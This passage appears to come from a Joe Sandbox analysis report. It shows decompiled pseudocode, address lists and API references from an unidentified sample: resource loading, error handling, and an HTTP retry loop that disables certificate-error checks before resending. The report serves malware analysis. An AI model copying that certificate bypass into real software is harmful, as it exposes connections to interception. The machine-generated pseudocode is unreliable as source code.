				return E00D0071A(_t62, _t66, _v8 ^ _t103, _t89, _t92, _t96);
			}















































                                                                                                                                                                                          0x00cfe1a0
                                                                                                                                                                                          0x00cfe1a6
                                                                                                                                                                                          0x00cfe1ac
                                                                                                                                                                                          0x00cfe1b3
                                                                                                                                                                                          0x00cfe1bb
                                                                                                                                                                                          0x00cfe1cb
                                                                                                                                                                                          0x00cfe1cd
                                                                                                                                                                                          0x00cfe1d5
                                                                                                                                                                                          0x00cfe1e1
                                                                                                                                                                                          0x00cfe1f9
                                                                                                                                                                                          0x00cfe1fe
                                                                                                                                                                                          0x00cfe205
                                                                                                                                                                                          0x00cfe208
                                                                                                                                                                                          0x00cfe210
                                                                                                                                                                                          0x00cfe210
                                                                                                                                                                                          0x00cfe212
                                                                                                                                                                                          0x00cfe213
                                                                                                                                                                                          0x00cfe227
                                                                                                                                                                                          0x00cfe231
                                                                                                                                                                                          0x00cfe23b
                                                                                                                                                                                          0x00cfe24e
                                                                                                                                                                                          0x00cfe255
                                                                                                                                                                                          0x00cfe26d
                                                                                                                                                                                          0x00cfe274
                                                                                                                                                                                          0x00cfe27b
                                                                                                                                                                                          0x00cfe280
                                                                                                                                                                                          0x00cfe283
                                                                                                                                                                                          0x00cfe285
                                                                                                                                                                                          0x00cfe287
                                                                                                                                                                                          0x00cfe28b
                                                                                                                                                                                          0x00cfe2a1
                                                                                                                                                                                          0x00cfe2a6
                                                                                                                                                                                          0x00cfe2ad
                                                                                                                                                                                          0x00cfe2b0
                                                                                                                                                                                          0x00cfe2b3
                                                                                                                                                                                          0x00cfe2b3
                                                                                                                                                                                          0x00cfe2b5
                                                                                                                                                                                          0x00cfe2b6
                                                                                                                                                                                          0x00cfe2c1
                                                                                                                                                                                          0x00cfe2c3
                                                                                                                                                                                          0x00cfe2c7
                                                                                                                                                                                          0x00cfe2d0
                                                                                                                                                                                          0x00cfe2d0
                                                                                                                                                                                          0x00cfe2d2
                                                                                                                                                                                          0x00cfe2d3
                                                                                                                                                                                          0x00cfe2db
                                                                                                                                                                                          0x00cfe2e1
                                                                                                                                                                                          0x00cfe2e5
                                                                                                                                                                                          0x00cfe2e8
                                                                                                                                                                                          0x00cfe2e8
                                                                                                                                                                                          0x00cfe2ea
                                                                                                                                                                                          0x00cfe2eb
                                                                                                                                                                                          0x00cfe2ef
                                                                                                                                                                                          0x00cfe2dd
                                                                                                                                                                                          0x00cfe2dd
                                                                                                                                                                                          0x00cfe2dd
                                                                                                                                                                                          0x00cfe2f2
                                                                                                                                                                                          0x00cfe2ff
                                                                                                                                                                                          0x00cfe304
                                                                                                                                                                                          0x00cfe305
                                                                                                                                                                                          0x00cfe308
                                                                                                                                                                                          0x00cfe313
                                                                                                                                                                                          0x00cfe315
                                                                                                                                                                                          0x00cfe31c
                                                                                                                                                                                          0x00cfe331
                                                                                                                                                                                          0x00cfe337
                                                                                                                                                                                          0x00cfe33c
                                                                                                                                                                                          0x00cfe33c
                                                                                                                                                                                          0x00cfe346
                                                                                                                                                                                          0x00cfe347
                                                                                                                                                                                          0x00cfe352

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memset$__strlwr_strncat_vswprintf_s
                                                                                                                                                                                          • String ID: %02x
                                                                                                                                                                                          • API String ID: 259801040-560843007
                                                                                                                                                                                          • Opcode ID: 2eafea701f005e3a1b5311811bdb8f22b1727635ca82c1776fb500d61529b304
                                                                                                                                                                                          • Instruction ID: a7600a08e2627e27669025c4e10ad81472193cf0875aad75e256bbffbca2c1f7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2eafea701f005e3a1b5311811bdb8f22b1727635ca82c1776fb500d61529b304
                                                                                                                                                                                          • Instruction Fuzzy Hash: EA41AE71108345AFE334DF74C895FEB7BE9EF89300F044919F69D87191EA71A6088BA2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9B073 Relevance: 10.6, APIs: 7, Instructions: 108libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                          			E00C9B073(void* __ebx, intOrPtr __ecx, short* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t30;
				struct HINSTANCE__* _t35;
				signed int _t37;
				void* _t38;
				void* _t45;
				signed int _t47;
				WCHAR* _t50;
				void* _t51;
				WCHAR* _t65;
				struct HRSRC__* _t66;
				void* _t67;
				int _t68;
				void* _t71;
				void* _t72;
				short** _t73;
				void* _t75;

				_t63 = __edx;
				_t73 = _t75 - 0x400;
				_t30 =  *0xd64070; // 0x8a9e1774
				_t73[0x101] = _t30 ^ _t73;
				_push(0x1c);
				E00D0158D(0xd30036, __ebx, __edi, __esi);
				_t65 = _t73[0x105];
				_t50 = _t73[0x106];
				 *((intOrPtr*)(_t73 - 0x1c)) = 0;
				 *((intOrPtr*)(_t73 - 4)) = 0;
				 *((intOrPtr*)(_t73 - 0x24)) = __ecx;
				 *((intOrPtr*)(_t73 - 0x28)) = 0;
				 *_t73 = 0;
				 *((char*)(_t73 - 4)) = 1;
				_t35 = LoadLibraryExW(_t73[0x104], 0, 2);
				 *(_t73 - 0x14) = _t35;
				if(_t35 != 0) {
					_t66 = FindResourceW(_t35, _t65, _t50);
					__eflags = _t66;
					if(_t66 != 0) {
						_t37 = LoadResource( *(_t73 - 0x14), _t66);
						 *(_t73 - 0x20) = _t37;
						__eflags = _t37;
						if(_t37 == 0) {
							goto L3;
						}
						_t68 = SizeofResource( *(_t73 - 0x14), _t66);
						_t15 = _t68 + 1; // 0x1
						_t45 = _t15;
						 *(_t73 - 0x18) = _t68;
						__eflags = _t45 - _t68;
						if(_t45 >= _t68) {
							 *((char*)(_t73 - 4)) = 2;
							E00C999B9(_t73, _t45);
							 *((intOrPtr*)(_t73 - 4)) = 1;
							__eflags =  *_t73;
							if( *_t73 != 0) {
								_t47 = MultiByteToWideChar(3, 0,  *(_t73 - 0x20), _t68,  *_t73, _t68);
								__eflags = _t47;
								if(_t47 == 0) {
									goto L3;
								}
								_t63 =  *_t73;
								_push(_t73[0x107]);
								__eflags = 0;
								( *_t73)[_t47] = 0;
								_push( *_t73);
								_t38 = E00C9AB23(_t50, _t73 - 0x28,  *_t73, 0);
								L15:
								_t71 = _t38;
								L16:
								FreeLibrary( *(_t73 - 0x14));
								L17:
								_t40 =  &(_t73[1]);
								if( *_t73 !=  &(_t73[1])) {
									E00C99091(_t40, _t50, _t73);
								}
								L9:
								E00C98F74(_t40, _t73 - 0x1c);
								 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0xc));
								_pop(_t67);
								_pop(_t72);
								_pop(_t51);
								return E00D0071A(_t71, _t51, _t73[0x101] ^ _t73, _t63, _t67, _t72);
							}
							_t71 = 0x8007000e;
							goto L16;
						}
						_t40 =  &(_t73[1]);
						__eflags =  *_t73 -  &(_t73[1]);
						if( *_t73 !=  &(_t73[1])) {
							E00C99091(_t40, _t50, _t73);
						}
						_t71 = 0x8007000e;
						goto L9;
					}
					L3:
					_t38 = E00C963C0();
					goto L15;
				}
				_t71 = E00C963C0();
				goto L17;
			}




















                                                                                                                                                                                          0x00c9b073
                                                                                                                                                                                          0x00c9b07a
                                                                                                                                                                                          0x00c9b07e
                                                                                                                                                                                          0x00c9b085
                                                                                                                                                                                          0x00c9b08b
                                                                                                                                                                                          0x00c9b092
                                                                                                                                                                                          0x00c9b09d
                                                                                                                                                                                          0x00c9b0a3
                                                                                                                                                                                          0x00c9b0ab
                                                                                                                                                                                          0x00c9b0ae
                                                                                                                                                                                          0x00c9b0b1
                                                                                                                                                                                          0x00c9b0b4
                                                                                                                                                                                          0x00c9b0b7
                                                                                                                                                                                          0x00c9b0be
                                                                                                                                                                                          0x00c9b0c2
                                                                                                                                                                                          0x00c9b0c8
                                                                                                                                                                                          0x00c9b0cd
                                                                                                                                                                                          0x00c9b0e4
                                                                                                                                                                                          0x00c9b0e6
                                                                                                                                                                                          0x00c9b0e8
                                                                                                                                                                                          0x00c9b0f8
                                                                                                                                                                                          0x00c9b0fe
                                                                                                                                                                                          0x00c9b101
                                                                                                                                                                                          0x00c9b103
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b10f
                                                                                                                                                                                          0x00c9b111
                                                                                                                                                                                          0x00c9b111
                                                                                                                                                                                          0x00c9b114
                                                                                                                                                                                          0x00c9b117
                                                                                                                                                                                          0x00c9b119
                                                                                                                                                                                          0x00c9b163
                                                                                                                                                                                          0x00c9b167
                                                                                                                                                                                          0x00c9b16c
                                                                                                                                                                                          0x00c9b187
                                                                                                                                                                                          0x00c9b18a
                                                                                                                                                                                          0x00c9b19e
                                                                                                                                                                                          0x00c9b1a4
                                                                                                                                                                                          0x00c9b1a6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b1ac
                                                                                                                                                                                          0x00c9b1af
                                                                                                                                                                                          0x00c9b1b5
                                                                                                                                                                                          0x00c9b1b7
                                                                                                                                                                                          0x00c9b1bb
                                                                                                                                                                                          0x00c9b1c1
                                                                                                                                                                                          0x00c9b1c6
                                                                                                                                                                                          0x00c9b1c6
                                                                                                                                                                                          0x00c9b1c8
                                                                                                                                                                                          0x00c9b1cb
                                                                                                                                                                                          0x00c9b1d1
                                                                                                                                                                                          0x00c9b1d1
                                                                                                                                                                                          0x00c9b1d7
                                                                                                                                                                                          0x00c9b1e0
                                                                                                                                                                                          0x00c9b1e0
                                                                                                                                                                                          0x00c9b130
                                                                                                                                                                                          0x00c9b133
                                                                                                                                                                                          0x00c9b13d
                                                                                                                                                                                          0x00c9b145
                                                                                                                                                                                          0x00c9b146
                                                                                                                                                                                          0x00c9b147
                                                                                                                                                                                          0x00c9b15c
                                                                                                                                                                                          0x00c9b15c
                                                                                                                                                                                          0x00c9b18c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b18c
                                                                                                                                                                                          0x00c9b11b
                                                                                                                                                                                          0x00c9b11e
                                                                                                                                                                                          0x00c9b121
                                                                                                                                                                                          0x00c9b126
                                                                                                                                                                                          0x00c9b126
                                                                                                                                                                                          0x00c9b12b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b12b
                                                                                                                                                                                          0x00c9b0ea
                                                                                                                                                                                          0x00c9b0ea
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b0ea
                                                                                                                                                                                          0x00c9b0d4
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00C9B092
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,0000001C), ref: 00C9B0C2
                                                                                                                                                                                          • FindResourceW.KERNEL32(00000000,?,?), ref: 00C9B0DE
                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00C9B1CB
                                                                                                                                                                                            • Part of subcall function 00C963C0: GetLastError.KERNEL32(00C9689C), ref: 00C963C0
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$ErrorFindFreeH_prolog3_catchLastLoadResource
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1376058422-0
                                                                                                                                                                                          • Opcode ID: 9dab78542db6ec246ffbd0d57a1eb1723b785dc7dbdcef36a224be8fe16f4897
                                                                                                                                                                                          • Instruction ID: e2806f29d26a7f8c7e0f8268abe5ab0ea7af99e76124a5da4a126f851776e586
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9dab78542db6ec246ffbd0d57a1eb1723b785dc7dbdcef36a224be8fe16f4897
                                                                                                                                                                                          • Instruction Fuzzy Hash: E9418E70900258EBCF21DFA4DD49AEE7BB5FF48710F10802AF915A7291D7359E40DBA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C88440 Relevance: 10.6, APIs: 7, Instructions: 100COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 34%
                                                                                                                                                                                          			E00C88440(void* __ebx, char __ecx, void* __edi, void* __esi, void* __ebp) {
				char _v4;
				char _v8;
				long _t13;
				intOrPtr* _t14;
				long _t18;
				intOrPtr* _t19;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				void* _t28;
				char _t33;
				void* _t42;
				void* _t44;
				char _t46;
				void* _t50;

				_t33 = __ecx;
				_push(__ecx);
				_t46 = 5;
				_t13 = GetLastError();
				_t14 = E00D05D61(_t50);
				_t42 = E00C89BB0();
				 *((intOrPtr*)(E00D05D61(_t50))) =  *_t14;
				SetLastError(_t13);
				if(_t42 != 0) {
					_t1 = _t42 + 8; // 0x8
					_t28 = _t1;
					if(_t28 != 0) {
						_t46 =  *((intOrPtr*)(_t28 + 8));
					}
				}
				_t53 =  *0xd68cd4;
				if( *0xd68cd4 != 0) {
					_t26 = E00C881F0( &_v4);
					_t33 = _v4;
					 *0xd68cd4(_t26, _t33);
				}
				_v4 = _t46;
				E00D00729( &_v4, 0xd59760);
				_pop(_t39);
				_pop(_t43);
				_pop(_t31);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_push(_t33);
				_t18 = GetLastError();
				_t19 = E00D05D61(_t53);
				_t44 = E00C89BB0();
				 *((intOrPtr*)(E00D05D61(_t53))) =  *_t19;
				SetLastError(_t18);
				if(_t44 == 0) {
					L7:
					_v8 = 5;
					_t23 = E00D00729( &_v8, 0xd59760);
					goto L8;
				} else {
					_t7 = _t44 + 8; // 0x8
					_t23 = _t7;
					if(_t23 != 0) {
						L8:
						_v8 =  *((intOrPtr*)(_t23 + 8));
						_t24 = E00D00729( &_v8, 0xd59760);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						 *0xd68cd4 = _t24;
						return _t24;
					}
					goto L7;
				}
			}


















                                                                                                                                                                                          0x00c88440
                                                                                                                                                                                          0x00c88440
                                                                                                                                                                                          0x00c88445
                                                                                                                                                                                          0x00c8844a
                                                                                                                                                                                          0x00c88452
                                                                                                                                                                                          0x00c8845e
                                                                                                                                                                                          0x00c88466
                                                                                                                                                                                          0x00c88468
                                                                                                                                                                                          0x00c88470
                                                                                                                                                                                          0x00c88472
                                                                                                                                                                                          0x00c88472
                                                                                                                                                                                          0x00c88477
                                                                                                                                                                                          0x00c88479
                                                                                                                                                                                          0x00c88479
                                                                                                                                                                                          0x00c88477
                                                                                                                                                                                          0x00c8847c
                                                                                                                                                                                          0x00c88483
                                                                                                                                                                                          0x00c8848a
                                                                                                                                                                                          0x00c8848f
                                                                                                                                                                                          0x00c88495
                                                                                                                                                                                          0x00c8849b
                                                                                                                                                                                          0x00c884a8
                                                                                                                                                                                          0x00c884ac
                                                                                                                                                                                          0x00c884b1
                                                                                                                                                                                          0x00c884b2
                                                                                                                                                                                          0x00c884b4
                                                                                                                                                                                          0x00c884b5
                                                                                                                                                                                          0x00c884b6
                                                                                                                                                                                          0x00c884b7
                                                                                                                                                                                          0x00c884b8
                                                                                                                                                                                          0x00c884b9
                                                                                                                                                                                          0x00c884ba
                                                                                                                                                                                          0x00c884bb
                                                                                                                                                                                          0x00c884bc
                                                                                                                                                                                          0x00c884bd
                                                                                                                                                                                          0x00c884be
                                                                                                                                                                                          0x00c884bf
                                                                                                                                                                                          0x00c884c0
                                                                                                                                                                                          0x00c884c4
                                                                                                                                                                                          0x00c884cc
                                                                                                                                                                                          0x00c884d8
                                                                                                                                                                                          0x00c884e0
                                                                                                                                                                                          0x00c884e2
                                                                                                                                                                                          0x00c884ea
                                                                                                                                                                                          0x00c884f3
                                                                                                                                                                                          0x00c884fd
                                                                                                                                                                                          0x00c88505
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c884ec
                                                                                                                                                                                          0x00c884ec
                                                                                                                                                                                          0x00c884ec
                                                                                                                                                                                          0x00c884f1
                                                                                                                                                                                          0x00c8850a
                                                                                                                                                                                          0x00c88517
                                                                                                                                                                                          0x00c8851b
                                                                                                                                                                                          0x00c88520
                                                                                                                                                                                          0x00c88521
                                                                                                                                                                                          0x00c88522
                                                                                                                                                                                          0x00c88523
                                                                                                                                                                                          0x00c88524
                                                                                                                                                                                          0x00c88525
                                                                                                                                                                                          0x00c88526
                                                                                                                                                                                          0x00c88527
                                                                                                                                                                                          0x00c88528
                                                                                                                                                                                          0x00c88529
                                                                                                                                                                                          0x00c8852a
                                                                                                                                                                                          0x00c8852b
                                                                                                                                                                                          0x00c8852c
                                                                                                                                                                                          0x00c8852d
                                                                                                                                                                                          0x00c8852e
                                                                                                                                                                                          0x00c8852f
                                                                                                                                                                                          0x00c88530
                                                                                                                                                                                          0x00c88535
                                                                                                                                                                                          0x00c88535
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c884f1

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00C8844A
                                                                                                                                                                                            • Part of subcall function 00D05D61: __getptd_noexit.LIBCMT ref: 00D05D61
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00C88468
                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00C884AC
                                                                                                                                                                                          • GetLastError.KERNEL32(?,00D59760), ref: 00C884C4
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00C884E2
                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00C88505
                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00C8851B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$Exception@8Throw$__getptd_noexit
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2827010845-0
                                                                                                                                                                                          • Opcode ID: 3e9e5741e39eda7b5d2b684f3b030c24497d3f7f753687811817a40f8b0b71c5
                                                                                                                                                                                          • Instruction ID: ea47834b494f817bf78bd4d7fa5152f10671b23c902dd82c4d1be609adc48060
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e9e5741e39eda7b5d2b684f3b030c24497d3f7f753687811817a40f8b0b71c5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C215C71500305AFC720FFA5E889A2BBBACEF85741F09081EBA5587261DF74990CCB71
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8A900 Relevance: 10.6, APIs: 7, Instructions: 82networksleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00C8A900(void* __esi) {
				long _v8;
				intOrPtr _v12;
				int _v16;
				long _v24;
				long _v28;
				void _v36;
				void _v40;
				void _v56;
				intOrPtr _t18;
				long _t23;
				int _t35;
				void* _t37;

				_t37 = __esi;
				_t35 = 0;
				_v12 = 3;
				_v16 = 0;
				_v8 = 4;
				if(__esi != 0) {
					while(1) {
						_t18 = _v12;
						_v12 = _t18 - 1;
						if(_t18 <= 0) {
							break;
						}
						if(HttpSendRequestW(_t37, 0, 0, 0, 0) != 0) {
							_v36 = 0;
							_v28 = 4;
							_t35 = HttpQueryInfoW(_t37, 0x20000013,  &_v36,  &_v28, 0);
							if(_t35 == 0) {
								goto L8;
							} else {
								if(_v56 != 0xc8) {
									_t35 = 0;
									continue;
								}
							}
						} else {
							_t23 = GetLastError();
							if(_t23 == 0x2f0d || _t23 == 0x2f19) {
								_v24 = 4;
								InternetQueryOptionW(_t37, 0x1f,  &_v40,  &_v24);
								_v56 = _v56 | 0x00003180;
								InternetSetOptionW(_t37, 0x1f,  &_v56, 4);
								_t35 = HttpSendRequestW(_t37, 0, 0, 0, 0);
							}
							if(_t35 == 0) {
								L8:
								Sleep(0x3e8);
							}
							continue;
						}
						break;
					}
				}
				return _t35;
			}















                                                                                                                                                                                          0x00c8a900
                                                                                                                                                                                          0x00c8a904
                                                                                                                                                                                          0x00c8a906
                                                                                                                                                                                          0x00c8a90e
                                                                                                                                                                                          0x00c8a912
                                                                                                                                                                                          0x00c8a91c
                                                                                                                                                                                          0x00c8a930
                                                                                                                                                                                          0x00c8a930
                                                                                                                                                                                          0x00c8a937
                                                                                                                                                                                          0x00c8a93d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8a952
                                                                                                                                                                                          0x00c8a9ca
                                                                                                                                                                                          0x00c8a9d2
                                                                                                                                                                                          0x00c8a9e0
                                                                                                                                                                                          0x00c8a9e4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8a9e6
                                                                                                                                                                                          0x00c8a9ee
                                                                                                                                                                                          0x00c8a9f0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8a9f0
                                                                                                                                                                                          0x00c8a9ee
                                                                                                                                                                                          0x00c8a954
                                                                                                                                                                                          0x00c8a954
                                                                                                                                                                                          0x00c8a95f
                                                                                                                                                                                          0x00c8a975
                                                                                                                                                                                          0x00c8a97d
                                                                                                                                                                                          0x00c8a97f
                                                                                                                                                                                          0x00c8a991
                                                                                                                                                                                          0x00c8a9a2
                                                                                                                                                                                          0x00c8a9a2
                                                                                                                                                                                          0x00c8a9a6
                                                                                                                                                                                          0x00c8a9a8
                                                                                                                                                                                          0x00c8a9ad
                                                                                                                                                                                          0x00c8a9ad
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8a9a6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8a952
                                                                                                                                                                                          0x00c8a9f8
                                                                                                                                                                                          0x00c8a9ff

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • HttpSendRequestW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C8A94C
                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00C8A954
                                                                                                                                                                                          • InternetQueryOptionW.WININET(?,0000001F,?,?), ref: 00C8A97D
                                                                                                                                                                                          • InternetSetOptionW.WININET(?,0000001F,?,00000004), ref: 00C8A991
                                                                                                                                                                                          • HttpSendRequestW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C8A9A0
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,?,20000013,?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 00C8A9AD
                                                                                                                                                                                          • HttpQueryInfoW.WININET(?,20000013,?,?,00000000), ref: 00C8A9DA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Http$InternetOptionQueryRequestSend$ErrorInfoLastSleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3342051080-0
                                                                                                                                                                                          • Opcode ID: d5ee63cc0bbde84df4df8b7adeb69a785500b36c9b83a409450e0c5ab37c1e58
                                                                                                                                                                                          • Instruction ID: e0160d1f80248af776ce71c3f493f6b722b1b5462364f58c451e9e76905d9e99
                                                                                                                                                                                          • Opcode Fuzzy Hash: d5ee63cc0bbde84df4df8b7adeb69a785500b36c9b83a409450e0c5ab37c1e58
                                                                                                                                                                                          • Instruction Fuzzy Hash: 502195712487026BF311EB5DCC49B6AB2E8ABC8704F15451AF254D72D0DBB4D6098B6F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9792F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80registrywindowtimeCOMMON
                                                                                                                                                                                          Download Yara Rule
